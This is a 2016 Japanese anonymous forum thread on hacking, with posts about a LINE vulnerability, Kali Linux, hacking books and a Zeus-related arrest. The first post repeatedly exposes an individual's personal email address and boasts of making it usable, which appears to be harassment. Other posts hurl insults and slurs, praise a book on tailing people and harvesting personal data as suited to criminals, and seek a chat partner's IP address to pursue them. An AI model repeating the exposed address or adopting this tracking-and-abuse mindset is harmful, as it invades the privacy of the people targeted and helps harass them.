[0424 名無しさん＠いたづらはいやづら 2016/02/25(木) 00:02:55.87 ID:???]

井上
inoue1952w@gmail.com
井上
inoue1952w@gmail.com
井上
inoue1952w@gmail.com
井上
inoue1952w@gmail.com
井上
inoue1952w@gmail.com

せっかくやから★を@に変えといたったで
親切やろ？ワイに感謝しろや 👀
Rock54: Caution(BBR-MD5:0be15ced7fbdb9fdb4d0ce1929c1b82f)

[0425 jack 2016/02/25(木) 03:41:13.62 ID:???]

井上さんの（放送禁止用語）をjackしますた。

[0426 名無し 2016/02/25(木) 23:45:56.87 ID:???]

>>419
お前何人だよ読みにくいんだよ
答える気失せるわ死ねよ

[0427 qwert 2016/02/27(土) 20:05:06.99 ID:???]

lineの脆弱性やばくね?

[0428 オッパイ村 2016/02/27(土) 20:30:46.92 ID:bf2DH4b8]

いやマジでここ最近オッパイソンさんのリリースラッシュは何なの？
3月にも出るし毎月数冊出てねえか？www

これはもうPython触るしかない！

[0429 anonymous 2016/02/27(土) 21:05:19.94 ID:???]

>>427
何を今更
LINEなんて情弱が訳も分からず便利だからってだけで使うツールだろ

[0430 チョン 2016/02/27(土) 21:43:32.64 ID:BoEvSo+K]

>>427
脆弱性kwsk

[0431 qwert 2016/02/28(日) 09:42:02.36 ID:???]

>>430
https://youtu.be/53iq7_AuCBI
高校生がみつけたらしいぜ

[0432 マツモト 2016/02/28(日) 16:25:17.54 ID:bOn7srCb]

MetasploitはRubyなんよなあ

[0433 TT 2016/02/28(日) 21:24:08.94 ID:???]

ゼロデイアタックなのかな？
高校生自身で脆弱性を見つけたのならすごい話だね

[0434 anonymous 2016/02/28(日) 21:25:50.82 ID:???]

そのうちLINEのセキュリティ部門に引っ張られるんじゃない？

[0435 qwert 2016/02/28(日) 23:40:52.96 ID:???]

LINEの管理者はやくパッチ当てろよ

[0436 AHO 2016/02/29(月) 13:29:47.10 ID:XzPRRtOQ]

「ハッカーの学校」読んだ。

aircrack-ng等の無線ネットワークのハッキングがすっぽり抜けてる点でつまらん。
相変わらずツールの解説が多い。

これだけでは十分な内容とは言えない。前作の「ハッカーの教科書」と合わせて読んだほうが良い。
白夜書房のハッカージャパンのほうが面白かった。

ハッキングの勉強はネットのほうが充実してると思う。kaliのフォーラムとかYouTubeとか。

[0437 名無しさん＠いたづらはいやづら 2016/02/29(月) 17:17:27.65 ID:???]

本が古くて使えないのが増えたな

[0438 公式調味料梅風味みりん ◆VME8kenB5Qh1 2016/03/04(金) 10:15:54.13 ID:???]

変なのが湧いてるね
こんなところで人材募集してどうするんだろう
最初から冷やかしだろう

[0439 公式調味料梅風味みりん ◆VME8kenB5Qh1 2016/03/04(金) 10:17:00.68 ID:???]

>>437
もっとひどいのは古くて使えない本に書いてある基本のない使えない人間が増えたこと
たとえば、わい

[0440 天才ショッカー ◆KjV5V9dJA6Be 2016/03/04(金) 21:46:13.18 ID:hHbBIcro]

kalilinuxとはなんぞや

[0441 天才ショッカー ◆KjV5V9dJA6Be 2016/03/04(金) 21:51:17.54 ID:hHbBIcro]

kalilinuxとはなんぞや

[0442 hoge 2016/03/05(土) 09:52:19.68 ID:???]

backtrackの次のバージョン
backtrack5 r3 -> kali linux 1.0 -> 2.0

[0443 こんにちは 2016/03/08(火) 03:48:25.51 ID:nIlYlJDU]

キリストキチガイと仲がよいようだな

[0444 こんにちは 2016/03/08(火) 13:06:49.51 ID:nIlYlJDU]

http://llodegaka.blogspot.jp/

[0445 AHO ◆FIIZ8SXQfS.Z 2016/03/08(火) 13:37:53.78 ID:???]

ハッカーの学校 個人情報調査の教科書

読んだ。第1段のよりスゲー面白かった。
尾行のやり方、ゴミから個人情報を得る方法、ピッキング解錠とか、鍵を拳で握り混んで武器にするとか書いてあるけど、この著者は何者ですか？(笑)

かなりサイバー犯罪者向けの内容で大満足でした(爆)

ついでに近くの棚にあったドローン自作の本も読んできたけど、オープンソースのソフトを使えば簡単かつ安上がりにドローン作れるっぽいね。

[0446 公式調味料梅風味みりん ◆VME8kenB5Qh1 2016/03/08(火) 20:04:29.63 ID:???]

>>440
Debianでも使ってろ
このdebu野郎が

[0447 anonymous 2016/03/09(水) 00:29:58.92 ID:LWyo99LS]

チャット相手のIPアドレス知りたいがパケット見てもわからんね
誘導サイト使うのは一度しか使えないし
なりすまし相手をどうにしかしたい好奇心

[0448 hoge 2016/03/09(水) 08:43:42.56 ID:???]

>>447
チャットってLINE?Skype?

[0449 Nanashi 2016/03/09(水) 09:26:44.26 ID:???]

>>447
IPアドレスなんて通常動的に割り当てられるこの時代、知って何が嬉しいの？

[0450 anonymous 2016/03/09(水) 10:59:10.34 ID:LWyo99LS]

>>448
スカイプはパケット見れば分かります
チャットと検索して出てくるようなものを想定していただければと思います
>>449
日をまたがずにリリース時間内で出入りがあるのでIPは変わっていないはずです
固定IPアドレスのKDDIなんてのもありますしね

[0451 け 2016/03/10(木) 23:30:56.06 ID:xTWgBBx7]

>>405
遅れた。ごめん
http://www.sankei.com/west/news/160217/wst1602170006-n1.html
正確には「日本政府を攻撃したい」って予告しただけみたいだが
アカウント上でZeusやらをgitで拾ったのを晒したのも捕まった原因の一つとかどうとか